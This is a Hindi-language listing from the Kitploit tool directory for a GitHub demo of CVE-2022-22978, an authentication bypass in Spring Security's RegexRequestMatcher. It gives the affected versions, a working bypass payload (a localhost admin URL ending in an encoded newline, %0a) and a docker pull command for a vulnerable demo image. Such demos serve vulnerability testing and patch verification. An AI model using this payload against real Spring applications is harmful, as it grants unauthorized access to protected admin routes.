Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22978 — CVE-2022-22978 Spring-Security बायपास डेमो | Kitploit
उपकरण/GitHubGitHub/deepingh0st/cve-2022-22978
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubdeepingh0st/cve-2022-22978

CVE-2022-22978

CVE-2022-22978 Spring-Security बायपास डेमो

रिपॉजिटरी देखें
15334 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22978 Spring-Security बाईपास डेमो

जब Spring Security में RegexRequestMatcher का उपयोग किया जाता है और नियम में बिंदु वाले रेगुलर एक्सप्रेशन शामिल होते हैं, तो हमलावर दुर्भावनापूर्ण डेटा पैकेट बनाकर प्रमाणीकरण को बायपास कर सकता है।

प्रभाव क्षेत्र

Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4

पुनरुत्पादन

img.png img_1.png

Paylaod

http://localhost:8080/admin/index%0a

Docker

docker pull s0cke3t/cve-2022-22978:latest

टूल डाउनलोड करें